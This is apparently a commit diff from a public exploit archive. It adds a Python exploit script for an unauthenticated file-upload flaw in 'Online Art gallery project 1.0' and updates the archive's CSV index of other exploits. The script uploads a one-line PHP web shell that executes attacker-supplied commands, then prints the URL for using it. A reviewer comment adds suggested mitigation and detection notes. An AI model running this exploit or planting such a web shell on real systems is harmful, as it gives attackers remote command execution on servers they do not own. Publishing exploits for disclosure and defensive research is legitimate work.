DB: 2023-06-16
2 changes to exploits/shellcodes/ghdb: Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated); PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE); Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)
parent
158fcdfd5c
commit
1e4f82620a
2 changed files with 47 additions and 2 deletions
44
exploits/php/webapps/51524.py
Executable file
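--- /dev/null
+++ b/exploits/php/webapps/51524.py
@@ -0,0 +1,44 @@
+# Exploit Title: Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)
+# Google Dork: n/a
+# Date: 14/06/2023
+# Exploit Author: Ramil Mustafayev
+# Vendor Homepage: https://github.com/projectworldsofficial
+# Software Link: https://github.com/projectworlds32/Art-Gallary-php/archive/master.zip
+# Version: 1.0
+# Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28
+# CVE : n/a
+
+# Vulnerability Description:
+#
+# Online Art Gallery Project 1.0 allows unauthenticated users to perform arbitrary file uploads via the adminHome.php page. Due to the absence of an authentication mechanism and inadequate file validation, attackers can upload malicious files, potentially leading to remote code execution and unauthorized access to the server.
+# Usage: python exploit.py http://example.com
+
+import requests
+import sys
+
+def upload_file(url, filename, file_content):
+files = {
+'sliderpic': (filename, file_content, 'application/octet-stream')
+}
+
+data = {
+'img_id': '',
+'sliderPicSubmit': ''
+}
+url = url+"/Admin/adminHome.php"
+try:
+response = requests.post(url, files=files, data=data)
+except:
+print("[!] Exploit failed!")
+
+if __name__ == "__main__":
+if len(sys.argv) < 2:
+print("Usage: python exploit.py <target_url>")
+sys.exit(1)
+
+target_url = sys.argv[1]
+file_name = "simple-backdoor.php"
+file_content = '<?php system($_GET["c"]);?>'
+
+upload_file(target_url, file_name, file_content)
+print("[+] The simple-backdoor has been uploaded.\n Check following URL: "+target_url+"/images/Slider"+file_name+"?c=whoami")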
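Review bot: The header comment of 51524.py names the flaw (unauthenticated upload through `Admin/adminHome.php` with no file validation) but gives a reader nothing to fix or detect it with, and the script's output cannot serve as a check either, because `upload_file` never inspects `response` and the final `print` runs even after the bare `except:` has fired. I would add two header lines: `# Mitigation: require an authenticated admin session before handling the upload, accept only an allow-list of image types, and disable script execution in the upload directory.` and `# Detection: multipart POST to /Admin/adminHome.php with no session, followed by a request for a .php file under /images/.` The root cause is taken from the header comment only; the application's PHP is not part of this commit.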
|
@ -24609,6 +24609,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
39167,exploits/php/webapps/39167.txt,"Online Airline Booking System - Multiple Vulnerabilities",2016-01-05,"Manish Tanwar",webapps,php,80,2016-01-05,2016-01-05,0,OSVDB-132611;OSVDB-132610,,,,http://www.exploit-db.comOABSv1.7.zip,
|
||||
47366,exploits/php/webapps/47366.txt,"Online Appointment - SQL Injection",2019-09-09,"mohammad zaheri",webapps,php,80,2019-09-09,2019-09-10,0,,"SQL Injection (SQLi)",,,,
|
||||
51337,exploits/php/webapps/51337.txt,"Online Appointment System V1.0 - Cross-Site Scripting (XSS)",2023-04-08,"Sanjay Singh",webapps,php,,2023-04-08,2023-04-08,0,,,,,,
|
||||
51524,exploits/php/webapps/51524.py,"Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)",2023-06-15,"Ramil Mustafayev",webapps,php,,2023-06-15,2023-06-15,0,,,,,,
|
||||
50089,exploits/php/webapps/50089.txt,"Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-07-05,"Subhadip Nag",webapps,php,,2021-07-05,2021-07-05,0,,,,,,
|
||||
47922,exploits/php/webapps/47922.txt,"Online Book Store 1.0 - 'bookisbn' SQL Injection",2020-01-15,"Ertebat Gostar Co",webapps,php,,2020-01-15,2020-01-15,0,,,,,,
|
||||
48775,exploits/php/webapps/48775.txt,"Online Book Store 1.0 - 'id' SQL Injection",2020-08-31,"Moaaz Taha",webapps,php,,2020-08-31,2020-08-31,0,,,,,,
|
||||
|
@ -34525,7 +34526,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
48727,exploits/python/webapps/48727.py,"Pi-hole 4.3.2 - Remote Code Execution (Authenticated)",2020-08-04,"Luis Vacacas",webapps,python,,2020-08-04,2020-08-04,0,CVE-2020-8816,,,,,
|
||||
38738,exploits/python/webapps/38738.txt,"Plone - 'in_portal.py' < 4.1.3 Session Hijacking",2013-07-31,"Cyrill Bannwart",webapps,python,,2013-07-31,2015-11-17,1,CVE-2013-4200;OSVDB-95863,,,,,https://www.securityfocus.com/bid/61964/info
|
||||
49930,exploits/python/webapps/49930.txt,"Products.PluggableAuthService 2.6.0 - Open Redirect",2021-06-02,"Piyush Patil",webapps,python,,2021-06-02,2021-06-02,0,CVE-2021-21337,,,,http://www.exploit-db.comProducts.PluggableAuthService-2.6.0.zip,
|
||||
51522,exploits/python/webapps/51522.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-14,2023-06-14,0,CVE-2023-0297,,,,,
|
||||
51522,exploits/python/webapps/51522.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-14,2023-06-15,1,CVE-2023-0297,,,,,
|
||||
39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python,,2014-05-23,2016-01-08,1,CVE-2014-3854;OSVDB-107099,,,,,https://www.securityfocus.com/bid/67610/info
|
||||
51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-05-24,1,CVE-2022-31125,,,,,
|
||||
51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-06-04,1,CVE-2022-31126,,,,,
|
||||
|
@ -34553,7 +34554,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
40086,exploits/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB - Code Execution (Metasploit)",2016-07-11,Metasploit,remote,ruby,80,2016-07-11,2016-07-11,1,CVE-2016-2098,"Metasploit Framework (MSF)",,,,
|
||||
45601,exploits/ruby/webapps/45601.txt,"AlchemyCMS 4.1 - Cross-Site Scripting",2018-10-15,"Ismail Tasdelen",webapps,ruby,80,2018-10-15,2018-10-18,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comalchemy_cms-4.1.0.tar.gz,
|
||||
45592,exploits/ruby/webapps/45592.txt,"CAMALEON CMS 2.4 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,ruby,80,2018-10-12,2018-10-18,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comcamaleon-cms-2.4.0.tar.gz,
|
||||
51489,exploits/ruby/webapps/51489.txt,"Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)",2023-05-26,"PARAG BAGUL",webapps,ruby,,2023-05-26,2023-05-26,0,CVE-2023-30145,,,,,
|
||||
51489,exploits/ruby/webapps/51489.txt,"Camaleon CMS v2.7.0 - Server-Side Template Injection (SSTI)",2023-05-26,"PARAG BAGUL",webapps,ruby,,2023-05-26,2023-06-15,1,CVE-2023-30145,,,,,
|
||||
51446,exploits/ruby/webapps/51446.txt,"Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title",2023-05-23,"Yasin Gergin",webapps,ruby,,2023-05-23,2023-05-23,0,,,,,,
|
||||
46617,exploits/ruby/webapps/46617.txt,"Fat Free CRM 0.19.0 - HTML Injection",2019-03-28,"Ismail Tasdelen",webapps,ruby,80,2019-03-28,2019-03-29,0,CVE-2019-10226,,,,http://www.exploit-db.comfat_free_crm-0.18.1.tar.gz,
|
||||
41616,exploits/ruby/webapps/41616.rb,"GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution",2017-03-15,iblue,webapps,ruby,,2017-03-15,2017-03-27,1,,,,,,http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html
|
||||
|
|